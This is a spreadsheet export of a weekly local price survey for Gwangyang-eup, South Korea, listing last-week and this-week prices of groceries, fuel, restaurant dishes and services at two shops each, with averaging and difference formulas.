A82: 47 | B82: 택배이용료 | C82: 20kg이하, 타지역 | D82: =COUNTIF(J82,"<>0")+COUNTIF(N82,"<>0") -> 2 | E82: =COUNTIF(K82,"<>0")+COUNTIF(O82,"<>0") -> 2 | F82: =IF(D82=0,0,SUM(J82,N82)/D82) -> 7,000 | G82: =IF(E82=0,0,SUM(K82,O82)/E82) -> 7,000 | H82: =G82-F82 -> 0 | I82: 건영택배 | J82: 7000 | K82: 7000 | L82: =K82-J82 -> 0 | M82: 현대택배 | N82: 7,000 | O82: 7,000 | P82: =O82-N82 -> 0
A83: 48 | B83: 찜질방 이용료 | C83: 찜질방(성인 1회) (1회용품 제외) | D83: =COUNTIF(J83,"<>0")+COUNTIF(N83,"<>0") -> 0 | E83: =COUNTIF(K83,"<>0")+COUNTIF(O83,"<>0") -> 0 | F83: =IF(D83=0,0,SUM(J83,N83)/D83) -> 0 | G83: =IF(E83=0,0,SUM(K83,O83)/E83) -> 0 | H83: =G83-F83 -> 0 | J83: 0 | K83: 0 | L83: =K83-J83 -> 0 | N83: 0 | O83: 0 | P83: =O83-N83 -> 0
A84: 49 | B84: 대입학원비(종합) | C84: 대입(4년제)재수생 종합반 수강료 | D84: =COUNTIF(J84,"<>0")+COUNTIF(N84,"<>0") -> 0 | E84: =COUNTIF(K84,"<>0")+COUNTIF(O84,"<>0") -> 0 | F84: =IF(D84=0,0,SUM(J84,N84)/D84) -> 0 | G84: =IF(E84=0,0,SUM(K84,O84)/E84) -> 0 | H84: =G84-F84 -> 0 | J84: 0 | K84: 0 | L84: =K84-J84 -> 0 | N84: 0 | O84: 0 | P84: =O84-N84 -> 0
A85: 공산품 등 기타(13개품목)
A86: 1 | B86: 밀가루 | C86: 중력분 1등품 (1봉지 3kg) | D86: =COUNTIF(J86,"<>0")+COUNTIF(N86,"<>0") -> 2 | E86: =COUNTIF(K86,"<>0")+COUNTIF(O86,"<>0") -> 2 | F86: =IF(D86=0,0,SUM(J86,N86)/D86) -> 5,470 | G86: =IF(E86=0,0,SUM(K86,O86)/E86) -> 5,470 | H86: =G86-F86 -> 0 | I86: 농협하나로마트 | J86: 5350 | K86: 5350 | L86: =K86-J86 -> 0 | M86: 트라이얼코리아 | N86: 5,590 | O86: 5,590 | P86: =O86-N86 -> 0
A87: 2 | B87: 두부 | C87: 공장제품 1모 | D87: =COUNTIF(J87,"<>0")+COUNTIF(N87,"<>0") -> 2 | E87: =COUNTIF(K87,"<>0")+COUNTIF(O87,"<>0") -> 2 | F87: =IF(D87=0,0,SUM(J87,N87)/D87) -> 1,350 | G87: =IF(E87=0,0,SUM(K87,O87)/E87) -> 1,350 | H87: =G87-F87 -> 0 | I87: 농협하나로마트 | J87: 1250 | K87: 1250 | L87: =K87-J87 -> 0 | M87: 트라이얼코리아 | N87: 1,450 | O87: 1,450 | P87: =O87-N87 -> 0
A88: 3 | B88: 우유 | C88: 흰 우유(종이팩) 1개 200㎖ | D88: =COUNTIF(J88,"<>0")+COUNTIF(N88,"<>0") -> 2 | E88: =COUNTIF(K88,"<>0")+COUNTIF(O88,"<>0") -> 2 | F88: =IF(D88=0,0,SUM(J88,N88)/D88) -> 1,135 | G88: =IF(E88=0,0,SUM(K88,O88)/E88) -> 1,135 | H88: =G88-F88 -> 0 | I88: 농협하나로마트 | J88: 1080 | K88: 1080 | L88: =K88-J88 -> 0 | M88: 트라이얼코리아 | N88: 1,190 | O88: 1,190 | P88: =O88-N88 -> 0
A89: 4 | B89: 식용유 | C89: 콩기름 1.8ml | D89: =COUNTIF(J89,"<>0")+COUNTIF(N89,"<>0") -> 2 | E89: =COUNTIF(K89,"<>0")+COUNTIF(O89,"<>0") -> 2 | F89: =IF(D89=0,0,SUM(J89,N89)/D89) -> 6,985 | G89: =IF(E89=0,0,SUM(K89,O89)/E89) -> 6,985 | H89: =G89-F89 -> 0 | I89: 농협하나로마트 | J89: 6980 | K89: 6980 | L89: =K89-J89 -> 0 | M89: 트라이얼코리아 | N89: 6,990 | O89: 6,990 | P89: =O89-N89 -> 0
A90: 5 | B90: 설탕 | C90: 정백당 1kg | D90: =COUNTIF(J90,"<>0")+COUNTIF(N90,"<>0") -> 2 | E90: =COUNTIF(K90,"<>0")+COUNTIF(O90,"<>0") -> 2 | F90: =IF(D90=0,0,SUM(J90,N90)/D90) -> 2,935 | G90: 2,935 | H90: =G90-F90 -> 0 | I90: 농협하나로마트 | J90: 2380 | K90: 2380 | L90: =K90-J90 -> 0 | M90: 트라이얼코리아 | N90: 3,490 | O90: 3,490 | P90: =O90-N90 -> 0
A91: 6 | B91: 생수 | C91: 플라스틱 1병(500㎖) | D91: =COUNTIF(J91,"<>0")+COUNTIF(N91,"<>0") -> 2 | E91: =COUNTIF(K91,"<>0")+COUNTIF(O91,"<>0") -> 2 | F91: =IF(D91=0,0,SUM(J91,N91)/D91) -> 320 | G91: =IF(E91=0,0,SUM(K91,O91)/E91) -> 320 | H91: =G91-F91 -> 0 | I91: 농협하나로마트 | J91: 250 | K91: 250 | L91: =K91-J91 -> 0 | M91: 트라이얼코리아 | N91: 390 | O91: 390 | P91: =O91-N91 -> 0
A92: 7 | B92: 맥주 | C92: 1병 500㎖ (병 보증금 포함) | D92: =COUNTIF(J92,"<>0")+COUNTIF(N92,"<>0") -> 2 | E92: =COUNTIF(K92,"<>0")+COUNTIF(O92,"<>0") -> 2 | F92: =IF(D92=0,0,SUM(J92,N92)/D92) -> 1,680 | G92: =IF(E92=0,0,SUM(K92,O92)/E92) -> 1,680 | H92: =G92-F92 -> 0 | I92: 농협하나로마트 | J92: 1670 | K92: 1670 | L92: =K92-J92 -> 0 | M92: 트라이얼코리아 | N92: 1,690 | O92: 1,690 | P92: =O92-N92 -> 0
A93: 8 | B93: 소주 | C93: 1병 360㎖ (병 보증금 포함) | D93: =COUNTIF(J93,"<>0")+COUNTIF(N93,"<>0") -> 2 | E93: =COUNTIF(K93,"<>0")+COUNTIF(O93,"<>0") -> 2 | F93: =IF(D93=0,0,SUM(J93,N93)/D93) -> 1,360 | G93: =IF(E93=0,0,SUM(K93,O93)/E93) -> 1,360 | H93: =G93-F93 -> 0 | I93: 농협하나로마트 | J93: 1340 | K93: 1340 | L93: =K93-J93 -> 0 | M93: 트라이얼코리아 | N93: 1,380 | O93: 1,380 | P93: =O93-N93 -> 0
A94: 9 | B94: 등유 | C94: 주유소 판매 1ℓ | D94: =COUNTIF(J94,"<>0")+COUNTIF(N94,"<>0") -> 2 | E94: =COUNTIF(K94,"<>0")+COUNTIF(O94,"<>0") -> 2 | F94: =IF(D94=0,0,SUM(J94,N94)/D94) -> 1,400 | G94: =IF(E94=0,0,SUM(K94,O94)/E94) -> 1,400 | H94: =G94-F94 -> 0 | I94: 역전주유소 | J94: 1400 | K94: 1400 | L94: =K94-J94 -> 0 | M94: 황금주유소 | N94: 1,400 | O94: 1,400 | P94: =O94-N94 -> 0
A95: 10 | B95: 경유 | C95: 주유소 판매 1ℓ | D95: =COUNTIF(J95,"<>0")+COUNTIF(N95,"<>0") -> 2 | E95: =COUNTIF(K95,"<>0")+COUNTIF(O95,"<>0") -> 2 | F95: =IF(D95=0,0,SUM(J95,N95)/D95) -> 1,457 | G95: =IF(E95=0,0,SUM(K95,O95)/E95) -> 1,485 | H95: =G95-F95 -> 28 | I95: 역전주유소 | J95: 1457 | K95: 1475 | L95: =K95-J95 -> 18 | M95: 황금주유소 | N95: 1,457 | O95: 1,495 | P95: =O95-N95 -> 38
A96: 11 | B96: 휘발유 | C96: 주유소 판매 1ℓ (무연) | D96: =COUNTIF(J96,"<>0")+COUNTIF(N96,"<>0") -> 2 | E96: =COUNTIF(K96,"<>0")+COUNTIF(O96,"<>0") -> 2 | F96: =IF(D96=0,0,SUM(J96,N96)/D96) -> 1,541 | G96: =IF(E96=0,0,SUM(K96,O96)/E96) -> 1,576 | H96: =G96-F96 -> 35 | I96: 역전주유소 | J96: 1537 | K96: 1567 | L96: =K96-J96 -> 30 | M96: 황금주유소 | N96: 1,545 | O96: 1,585 | P96: =O96-N96 -> 40
A97: 12 | B97: 피아노 학원비 | C97: 관인학원 (초급반 1개월) | D97: =COUNTIF(J97,"<>0")+COUNTIF(N97,"<>0") -> 2 | E97: =COUNTIF(K97,"<>0")+COUNTIF(O97,"<>0") -> 2 | F97: =IF(D97=0,0,SUM(J97,N97)/D97) -> 130,000 | G97: =IF(E97=0,0,SUM(K97,O97)/E97) -> 130,000 | H97: =G97-F97 -> 0 | I97: 믿음음악학원 | J97: 130000 | K97: 130000 | L97: =K97-J97 -> 0 | M97: 에쎌피아노 | N97: 130,000 | O97: 130,000 | P97: =O97-N97 -> 0
A98: 13 | B98: 미술학원비 | C98: 초등 저학년 1개월 (재료비 포함) | D98: =COUNTIF(J98,"<>0")+COUNTIF(N98,"<>0") -> 2 | E98: =COUNTIF(K98,"<>0")+COUNTIF(O98,"<>0") -> 2 | F98: =IF(D98=0,0,SUM(J98,N98)/D98) -> 145,000 | G98: =IF(E98=0,0,SUM(K98,O98)/E98) -> 145,000 | H98: =G98-F98 -> 0 | I98: 아트하트학원 | J98: 150000 | K98: 150000 | L98: =K98-J98 -> 0 | M98: 아이피카소 | N98: 140,000 | O98: 140,000 | P98: =O98-N98 -> 0

Sheet 광양읍2
A2: 주 간 물 가 동 향(광양읍)
M3: 조사자 : 김국희
A4: 연번 | B4: 품목 | C4: 규격·단위 | F4: 평 균 | I4: 조 사 1 지 역(광양마트) | M4: 조 사 2 지 역(시장)
F5: 전주 | G5: 금주 | H5: 증감액 | I5: 조 사 처 | J5: 전주 | K5: 금주 | L5: 증감액 | M5: 조 사 처 | N5: 전주 | P5: 증감액
A6: 농·축·수산물(28개 품목)
A7: 1 | B7: 쌀 | C7: 일반미 20kg(광양좋은쌀) | D7: =COUNTIF(J7,"<>0")+COUNTIF(N7,"<>0") -> 2 | E7: =COUNTIF(K7,"<>0")+COUNTIF(O7,"<>0") -> 2 | F7: =IF(D7=0,0,SUM(J7,N7)/D7) -> 61,000 | G7: =IF(E7=0,0,SUM(K7,O7)/E7) -> 61,000 | H7: =G7-F7 -> 0 | I7: 광양마트 | J7: 66,000 | K7: 66,000 | L7: =K7-J7 -> 0 | M7: 시장 | N7: 56,000 | O7: 56,000 | P7: =O7-N7 -> 0
A8: 2 | B8: 무 | C8: 상품 1개(1㎏) | D8: =COUNTIF(J8,"<>0")+COUNTIF(N8,"<>0") -> 2 | E8: 2 | F8: =IF(D8=0,0,SUM(J8,N8)/D8) -> 2,250 | G8: 2,000 | H8: =G8-F8 -> -250 | I8: 광양마트 | J8: 2,500 | K8: 2,000 | L8: 0 | M8: 시장 | N8: 2,000 | O8: 2,000 | P8: =O8-N8 -> 0
A9: 3 | B9: 상추 | C9: 잎상추 500g | D9: 2 | E9: 2 | F9: 6,250 | G9: 6,250 | H9: =G9-F9 -> 0 | I9: 광양마트 | J9: 6,500 | K9: 6,500 | L9: =K9-J9 -> 0 | M9: 시장 | N9: 6,000 | O9: 6,000 | P9: 0
A10: 4 | B10: 양상추 | C10: 상품1개(350~400g) | D10: 2 | E10: 2 | F10: 2,750 | G10: 2,750 | H10: =G10-F10 -> 0 | I10: 광양마트 | J10: 3,500 | K10: 3,500 | L10: 0 | M10: 로컬푸드 | N10: 2,000 | O10: 2,000 | P10: 0
A11: 5 | B11: 애호박 | C11: 상품1개(300~350g) | D11: 2 | E11: 2 | F11: 2,950 | G11: 2,950 | H11: =G11-F11 -> 0 | I11: 광양마트 | J11: 3,900 | K11: 3,900 | L11: 0 | M11: 시장 | N11: 2,000 | O11: 2,000 | P11: 0
A12: 6 | B12: 열무 | C12: 상품 4kg(1단) | D12: 2 | E12: 2 | F12: 9,400 | G12: 9,400 | H12: =G12-F12 -> 0 | I12: 로컬푸드 | J12: 8,800 | K12: 8,800 | L12: 0 | M12: 시장 | N12: 10,000 | O12: 10,000 | P12: 0
A13: 7 | B13: 양파 | C13: 1망 1kg | D13: 2 | E13: 2 | F13: 3,000 | G13: 3,000 | H13: =G13-F13 -> 0 | I13: 광양마트 | J13: 3,000 | K13: 3,000 | L13: 0 | M13: 시장 | N13: 3,000 | O13: 3,000 | P13: 0
A14: 8 | B14: 오이 | C14: 상품 3개 | D14: 2 | E14: 2 | F14: 5,000 | G14: 5,000 | H14: 0 | I14: 광양마트 | J14: 5,000 | K14: 5,000 | L14: 0 | M14: 시장 | N14: 5,000 | O14: 5,000 | P14: 0
A15: 9 | B15: 풋고추 | C15: 신선한것 1kg | D15: 2 | E15: 2 | F15: 20,000 | G15: 20,000 | H15: 0 | I15: 광양마트(청양) | J15: 25,000 | K15: 25,000 | L15: 0 | M15: 시장 | N15: 15,000 | O15: 15,000 | P15: 0
A16: 10 | B16: 마늘 | C16: 깐것 상품 1kg | D16: 2 | E16: 2 | F16: 11,500 | G16: 11,500 | H16: 0 | I16: 광양마트 | J16: 13,000 | K16: 13,000 | L16: 0 | M16: 시장 | N16: 10,000 | O16: 10,000 | P16: 0
A17: 11 | B17: 감자 | C17: 흰색 1kg | D17: 2 | E17: 2 | F17: 4,500 | G17: 4,500 | H17: 0 | I17: 광양마트 | J17: 5,000 | K17: 5,000 | L17: 0 | M17: 시장 | N17: 4,000 | O17: 4,000 | P17: 0
A18: 12 | B18: 배추 | C18: 1포기 3kg | D18: =COUNTIF(J18,"<>0")+COUNTIF(N18,"<>0") -> 2 | E18: 2 | F18: 3,650 | G18: 3,650 | H18: 0 | I18: 로컬푸드 | J18: 4,000 | K18: 4,000 | L18: 0 | M18: 시장 | N18: 3,300 | O18: 3,300 | P18: 0
A19: 13 | B19: 콩나물 | C19: 1봉지 500g | D19: 2 | E19: 2 | F19: 2,000 | G19: 2,000 | H19: 0 | I19: 광양마트 | J19: 2,000 | K19: 2,000 | L19: 0 | M19: 시장 | N19: 2,000 | O19: 2,000 | P19: 0
A20: 14 | B20: 사과 | C20: 상품 1개(300∼350g) | D20: 2 | E20: 2 | F20: 3,725 | G20: 3,725 | H20: 0 | I20: 광양마트 | J20: 4,500 | K20: 4,500 | L20: 0 | M20: 로컬푸드 | N20: 2,950 | O20: 2,950 | P20: 0
A21: 15 | B21: 배 | C21: 상품 1개(650∼700g) | D21: 2 | E21: 2 | F21: 4,500 | G21: 4,500 | H21: 0 | I21: 광양마트 | J21: 5,000 | K21: 5,000 | L21: 0 | M21: 로컬푸드 | N21: 4,000 | O21: 4,000 | P21: 0
A22: 16 | B22: 바나나 | C22: 상품 1kg | D22: 2 | E22: 2 | F22: 3,500 | G22: 3,550 | H22: 50 | I22: 광양마트 | J22: 3,700 | K22: 3,700 | L22: 0 | M22: 로컬푸드 | N22: 3,300 | O22: 3,400 | P22: 100
A23: 17 | B23: 쇠고기 (한우) | C23: 등심 600g(상등육) | D23: 2 | E23: 2 | F23: 60,500 | G23: 60,500 | H23: 0 | I23: 로컬푸드 | J23: 63,000 | K23: 63,000 | L23: 0 | M23: 시장(정육점) | N23: 58,000 | O23: 58,000 | P23: 0
A24: 18 | B24: 쇠고기 (수입육) | C24: 등심 600g(상등육) | D24: 2 | E24: 2 | F24: 27,900 | G24: 27,900 | H24: 0 | I24: 광양마트 | J24: 40,800 | K24: 40,800 | L24: 0 | M24: 시장(정육점) | N24: 15,000 | O24: 15,000 | P24: 0
A25: 19 | B25: 돼지고기 | C25: 삼겹살 600g(상등육) | D25: 2 | E25: 2 | F25: 16,450 | G25: 16,450 | H25: 0 | I25: 광양마트 | J25: 15,900 | K25: 15,900 | L25: 0 | M25: 시장(정육점) | N25: 17,000 | O25: 17,000 | P25: 0
A26: 20 | B26: 닭고기 | C26: 육계 1마리(1kg 정도) | D26: 2 | E26: 2 | F26: 8,250 | G26: 8,250 | H26: 0 | I26: 광양마트 | J26: 7,500 | K26: 7,500 | L26: =K26-J26 -> 0 | M26: 시장 | N26: 9,000 | O26: 9,000 | P26: 0
A27: 21 | B27: 달걀 | C27: 특란 30개 한판 | D27: 2 | E27: 2 | F27: 8,400 | G27: 8,250 | H27: -150 | I27: 광양마트 | J27: 9,800 | K27: 9,500 | L27: -300 | M27: 시장 | N27: 7,000 | O27: 7,000 | P27: 0
A28: 22 | B28: 조기 | C28: 15cm 1마리 | D28: =COUNTIF(J28,"<>0")+COUNTIF(N28,"<>0") -> 2 | E28: 2 | F28: 2,750 | G28: 2,750 | H28: 0 | I28: 광양마트 | J28: 2,500 | K28: 2,500 | L28: 0 | M28: 시장 | N28: 3,000 | O28: 3,000 | P28: 0
A29: 23 | B29: 갈치 | C29: 60cm 1마리 | D29: 2 | E29: 2 | F29: 13,000 | G29: 13,000 | H29: 0 | I29: 광양마트 | J29: 11,000 | K29: 11,000 | L29: 0 | M29: 시장 | N29: 15,000 | O29: 15,000 | P29: 0
A30: 24 | B30: 명태 | C30: 40cm 1마리 | D30: 2 | E30: 2 | F30: 4,700 | G30: 4,700 | H30: 0 | I30: 광양마트 | J30: 4,900 | K30: 4,900 | L30: 0 | M30: 시장 | N30: 4,500 | O30: 4,500 | P30: 0
A31: 25 | B31: 고등어 | C31: 30cm 1마리 | D31: =COUNTIF(J31,"<>0")+COUNTIF(N31,"<>0") -> 2 | E31: 2 | F31: 4,550 | G31: 4,550 | H31: 0 | I31: 광양마트 | J31: 5,600 | K31: 5,600 | L31: 0 | M31: 시장 | N31: 3,500 | O31: 3,500 | P31: 0
A32: 26 | B32: 냉동오징어 | C32: 30cm 1마리 | D32: 2 | E32: 2 | F32: 5,650 | G32: 5,650 | H32: 0 | I32: 광양마트 | J32: 4,500 | K32: 4,500 | L32: 0 | M32: 시장 | N32: 6,800 | O32: 6,800 | P32: 0
A33: 27 | B33: 콩 | C33: 상품 1kg | D33: 2 | E33: 2 | G33: 8,400 | H33: 8,400 | I33: 로컬푸드 | J33: 8,500 | K33: 8,500 | L33: 0 | M33: 시장 | N33: 8,300 | O33: 8,300 | P33: 0
A34: 28 | B34: 고춧가루 | C34: 상품 3kg | D34: 2 | E34: 2 | G34: 100000 | H34: 100000 | I34: 광양마트 | J34: 110000 | K34: 110000 | L34: 0 | M34: 시장 | N34: 90000 | O34: 90000 | P34: 0
A35: 개인서비스 요금(49개 품목)
A36: 1 | B36: 설렁탕 | C36: 1인분 (보통) | D36: =COUNTIF(J36,"<>0")+COUNTIF(N36,"<>0") -> 2 | E36: =COUNTIF(K36,"<>0")+COUNTIF(O36,"<>0") -> 2 | F36: =IF(D36=0,0,SUM(J36,N36)/D36) -> 9,000 | G36: =IF(E36=0,0,SUM(K36,O36)/E36) -> 9,000 | H36: =G36-F36 -> 0 | I36: 이정재식육식당(곰탕) | J36: 9,000 | K36: 9,000 | L36: 0 | M36: 종갓집국밥 | N36: 9,000 | O36: 9,000 | P36: 0
A37: 2 | B37: 냉면 | C37: 물냉면, 1인분(보통) | D37: =COUNTIF(J37,"<>0")+COUNTIF(N37,"<>0") -> 2 | E37: 2 | F37: =IF(D37=0,0,SUM(J37,N37)/D37) -> 9,000 | G37: 9,000 | H37: =G37-F37 -> 0 | I37: 진주냉면 | J37: 10,000 | K37: 10,000 | L37: 0 | M37: 대갓집 | N37: 8,000 | O37: 8,000 | P37: 0
A38: 3 | B38: 비빔밥 | C38: 1인분(보통) | D38: 2 | E38: 2 | F38: 8,000 | G38: 8,000 | H38: 0 | I38: 전주비빔밥 | J38: 9,000 | K38: 9,000 | L38: 0 | M38: 사랑분식 | N38: 7,000 | O38: 7,000 | P38: 0
A39: 4 | B39: 갈비탕 | C39: 1인분(보통) | D39: 2 | E39: 2 | F39: 12,000 | G39: 12,000 | H39: 0 | I39: 진주냉면 | J39: 13,000 | K39: 13,000 | L39: 0 | M39: 대갓집 | N39: 11,000 | O39: 11,000 | P39: 0
A40: 5 | B40: 삼계탕 | C40: 1인분(보통) | D40: 2 | E40: 2 | F40: 13,500 | G40: 13,500 | H40: 0 | I40: 수양정 | J40: 13,000 | K40: 13,000 | L40: 0 | M40: 황제삼계탕 | N40: 14,000 | O40: 14,000 | P40: 0
A41: 6 | B41: 된장찌개 백반 | C41: 1인분(보통) | D41: 2 | E41: 2 | F41: 8,000 | G41: 8,000 | H41: 0 | I41: 금송숯불구이 | J41: 8,000 | K41: 8,000 | L41: 0 | M41: 만수정 | N41: 8,000 | O41: 8,000 | P41: 0
A42: 7 | B42: 김치찌개 백반 | C42: 1인분(보통) | D42: 2 | E42: 2 | F42: 8,500 | G42: 8,500 | H42: 0 | I42: 금송숯불구이 | J42: 8,000 | K42: 8,000 | L42: 0 | M42: 만수정 | N42: 9,000 | O42: 9,000 | P42: 0
A43: 8 | B43: 불고기 | C43: 1인분(200g) 공기밥 제외 | D43: 2 | E43: 2 | F43: 27,000 | G43: 27,000 | H43: 0 | I43: 행복한 한우 | J43: 27,000 | K43: 27,000 | L43: 0 | M43: 삼대불고기 | N43: 27,000 | O43: 27,000 | P43: 0
A44: 9 | B44: 등심구이 | C44: 1인분(200g) 공기밥 제외 | D44: 2 | E44: 2 | F44: 46,000 | G44: 46,000 | H44: 0 | I44: ok목장 | J44: 36,000 | K44: 36,000 | L44: 0 | M44: 백운뜰 | N44: 56,000 | O44: 56,000 | P44: 0
A45: 10 | B45: 생선초밥 | C45: 1인분(보통), 활어기준 | D45: 2 | E45: 2 | F45: 17,000 | G45: 17,000 | H45: 0 | I45: 먹어섬 | J45: 14,000 | K45: 14,000 | L45: 0 | M45: 정스시 | N45: 20,000 | O45: 20,000 | P45: 0
A46: 11 | B46: 튀김닭 | C46: 양념통닭 1마리 | D46: 2 | E46: 2 | F46: 19,000 | G46: 19,000 | H46: 0 | I46: 들녁숯불바베큐 | J46: 20,000 | K46: 20,000 | L46: 0 | M46: 냠냠닭컴 | N46: 18,000 | O46: 18,000 | P46: 0
A47: 12 | B47: 칼국수 | C47: 1인분(보통) | D47: 2 | E47: 2 | F47: 7,250 | G47: 7,250 | H47: 0 | J47: 8,000 | K47: 8,000 | L47: 0 | M47: 사랑분식 | N47: 6,500 | O47: 6,500 | P47: 0
A48: 13 | B48: 조리라면 | C48: 분식점 1인분 | D48: 2 | E48: 2 | F48: 4,000 | G48: 4,000 | H48: 0 | I48: 사랑분식 | J48: 4,000 | K48: 4,000 | L48: 0 | M48: 바오밥 | N48: 4,000 | O48: 4,000 | P48: 0
A49: 14 | B49: 김밥 | C49: 분식점 1인분 | D49: 2 | E49: 2 | F49: 3,250 | G49: 3,250 | H49: 0 | I49: 사랑분식 | J49: 3,000 | K49: 3,000 | L49: 0 | M49: 바오밥 | N49: 3,500 | O49: 3,500 | P49: 0
A50: 15 | B50: 짜장면 | C50: 1인분(보통) | D50: 2 | E50: 2 | F50: 6,000 | G50: 6,000 | H50: 0 | I50: 행복한젠시오 | J50: 6,000 | K50: 6,000 | L50: 0 | M50: 신흥일각 | N50: 6,000 | O50: 6,000 | P50: 0
A51: 16 | B51: 짬뽕 | C51: 1인분(보통) | D51: 2 | E51: 2 | F51: 8,000 | G51: 8,000 | H51: 0 | I51: 행복한젠시오 | J51: 8,000 | K51: 8,000 | L51: 0 | M51: 신흥일각 | N51: 8,000 | O51: 8,000 | P51: 0
A52: 17 | B52: 탕수육 | C52: 일반탕수육(보통) | D52: 2 | E52: 2 | F52: 27,000 | G52: 27,000 | H52: 0 | I52: 행복한젠시오 | J52: 27,000 | K52: 27,000 | L52: 0 | M52: 신흥일각 | N52: 27,000 | O52: 27,000 | P52: 0
A53: 18 | B53: 돈가스 | C53: 일반돈가스,1인분 | D53: 2 | E53: 2 | F53: 10,000 | G53: 10,000 | H53: 0 | I53: 사랑분식 | J53: 8,000 | K53: 8,000 | L53: 0 | M53: 피노아르떼소나무집 | N53: 12,000 | O53: 12,000 | P53: 0
A54: 19 | B54: 햄버거 | C54: 기본형(야채,고기) | D54: 2 | E54: 2 | F54: 4,100 | G54: 4,100 | H54: 0 | I54: 롯데리아 | J54: 4,700 | K54: 4,700 | L54: 0 | M54: 맘앤파파 | N54: 3,500 | O54: 3,500 | P54: 0
A55: 20 | B55: 피자 | C55: 기본형(야채,고기) | D55: 2 | E55: 2 | F55: 13,900 | G55: 13,900 | H55: 0 | I55: 피자스쿨 | J55: 13,900 | K55: 13,900 | L55: 0 | M55: 피자마루 | N55: 13,900 | O55: 13,900 | P55: 0
A56: 21 | B56: 커피(외식) | C56: 일반원두커피 | D56: 2 | E56: 2 | F56: 3,150 | G56: 3,150 | H56: 0 | I56: 까페345 | J56: 2,500 | K56: 2,500 | L56: 0 | M56: 코코베르나 | N56: 3,800 | O56: 3,800 | P56: 0
A57: 22 | B57: 국산차(외식) | C57: 녹차(티백 또는 잎녹차) | D57: 2 | E57: 2 | F57: 4,500 | G57: 4,500 | H57: 0 | I57: 까페345 | J57: 4,500 | K57: 4,500 | L57: 0 | M57: 코코베르나 | N57: 4,500 | O57: 4,500 | P57: 0
A58: 23 | B58: 삼겹살 | C58: 식육식당 200g(국내산) | D58: 2 | E58: 2 | F58: 15,300 | G58: 15,300 | H58: 0 | I58: 만수정 | J58: 17,300 | K58: 17,300 | L58: 0 | M58: 금송 | N58: 13,300 | O58: 13,300 | P58: 0
A59: 24 | B59: 돼지갈비 | C59: 식육식당 200g(국내산) | D59: 2 | E59: 2 | F59: 13,000 | G59: 13,000 | H59: 0 | I59: 대갓집 | J59: 14,000 | K59: 14,000 | L59: 0 | M59: 금송 | N59: 12,000 | O59: 12,000 | P59: 0
A60: 25 | B60: 갈비살 | C60: 식육식당 200g(국내산) | D60: 2 | E60: 2 | F60: 44,925 | G60: 44,925 | H60: 0 | I60: ok목장 | J60: 36,000 | K60: 36,000 | L60: 0 | M60: 금목서 | N60: 53,850 | O60: 53,850 | P60: 0
A61: 26 | B61: 생맥주 | C61: 500CC 1잔 | D61: 2 | E61: 2 | F61: 4,000 | G61: 4,000 | H61: 0 | I61: 들녁숯불바베큐 | J61: 4,000 | K61: 4,000 | L61: 0 | M61: 냠냠닭컴 | N61: 4,000 | O61: 4,000 | P61: 0
A62: 27 | B62: 공동 주택관리비 | C62: 주공 18평1개월 (공과금 제외) | D62: 2 | E62: 2 | F62: 51,770 | G62: 51,770 | H62: 0 | I62: 칠성주공a | J62: 57,900 | K62: 57,900 | L62: 0 | M62: 부영아파트 | N62: 45,640 | O62: 45,640 | P62: 0
A63: 28 | B63: 양 복 세탁료 | C63: 신사복 상·하 드라이크리닝 1회 | D63: 2 | E63: 2 | F63: 8,000 | G63: 8,000 | H63: 0 | I63: 매화세탁소 | J63: 9,000 | K63: 9,000 | L63: 0 | M63: 강남세탁소 | N63: 7,000 | O63: 7,000 | P63: 0
A64: 29 | B64: 의복수선료 | C64: 신사복 바지 밑단줄임 1회 | D64: 2 | E64: 2 | F64: 5,000 | G64: 5,000 | H64: 0 | I64: 매화세탁소 | J64: 6,000 | K64: 6,000 | L64: 0 | M64: 강남세탁소 | N64: 4,000 | O64: 4,000 | P64: 0
A65: 30 | B65: 영화관람요 (방화. 외화) | C65: 상영시간 100분정도 1회 (입장세,문예진흥기금포함) | D65: 2 | E65: 2 | F65: 0 | G65: 0 | H65: 0 | L65: 0 | P65: 0
A66: 31 | B66: 경기장 입장료 | C66: 공공체육시설 (성인 1인) | D66: 2 | E66: 2 | F66: 0 | G66: 0 | H66: 0 | L66: 0 | P66: 0
A67: 32 | B67: 수영장 이용료 | C67: 일반성인 1회 (체육기금 포함) | D67: 2 | E67: 2 | F67: 0 | G67: 0 | H67: 0 | L67: 0 | P67: 0
A68: 33 | B68: 볼링장 이용료 | C68: 일반성인 평일오후 1게임 | D68: 2 | E68: 2 | F68: 2,000 | G68: 2,000 | H68: 0 | I68: 칠성볼링장 | J68: 4,000 | K68: 4,000 | L68: 0 | P68: 0
A69: 34 | B69: 골프연습장 이용료 | C69: 초급(남자회원)1개월 (레슨비 미포함) | D69: 2 | E69: 2 | F69: 75,000 | G69: 75,000 | H69: 0 | I69: 덕산골프장 | J69: 150,000 | K69: 150,000 | L69: 0 | P69: 0
A70: 35 | B70: 노래방 이용료 | C70: 일반인 저녁 1시간 | D70: 2 | E70: 2 | F70: 25,000 | G70: 25,000 | H70: 0 | I70: 칠성노래방 | J70: 25,000 | K70: 25,000 | L70: 0 | M70: 고래고래 | N70: 25,000 | O70: 25,000 | P70: 0
A71: 36 | B71: 당구장 이용료 | C71: 큐선대 일반인 저녁 1시간 | D71: 2 | E71: 2 | F71: 10,900 | G71: 10,900 | H71: 0 | I71: 월드당구장 | J71: 11,000 | K71: 11,000 | L71: 0 | M71: 자니스당구장 | N71: 10,800 | O71: 10,800 | P71: 0
A72: 37 | B72: 사진촬영료 | C72: 칼라 반명함 1조 (상급사진관 3x4) | D72: 2 | E72: 2 | F72: 18,500 | G72: 18,500 | H72: 0 | I72: 리사진관 | J72: 17,000 | K72: 17,000 | L72: 0 | M72: 중앙사진관 | N72: 20,000 | O72: 20,000 | P72: 0
A73: 38 | B73: 사진인화료 | C73: 디지털사진인화요금, 현상료 포함 | D73: 2 | E73: 2 | F73: 400 | G73: 400 | H73: 0 | I73: 리사진관 | J73: 300 | K73: 300 | L73: 0 | M73: 중앙사진관 | N73: 500 | O73: 500 | P73: 0
A74: 39 | B74: 영상매체대여료 | C74: 최신판 영화 DVD대여요금 | D74: 1 | E74: 2 | F74: 0 | G74: 0 | H74: 0 | I74: 대여클럽 | J74: 0 | L74: 0 | P74: 0
A75: 40 | B75: 이용료(컷트) | C75: 성인조발 중류급 1회 | D75: 2 | E75: 2 | F75: 14,500 | G75: 14,500 | H75: 0 | I75: 옥룡이용원 | J75: 14,000 | K75: 14,000 | L75: 0 | M75: 숲샘이용원 | N75: 15,000 | O75: 15,000 | P75: 0
